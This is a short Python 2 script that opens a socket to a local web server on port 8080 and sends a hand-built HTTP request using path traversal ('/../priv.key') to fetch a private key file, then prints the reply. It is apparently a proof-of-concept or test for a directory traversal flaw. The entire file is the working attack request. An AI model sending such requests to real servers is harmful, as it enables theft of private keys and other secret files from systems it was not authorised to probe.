#! /usr/bin/env python

from socket import *

s = socket(AF_INET, SOCK_STREAM)
s.connect(('127.0.0.1', 8080))

s.send('GET /../priv.key HTTP/1.1\r\nContent-Length: 5\r\n\r\n12345');

print s.recv(10000)

s.close()
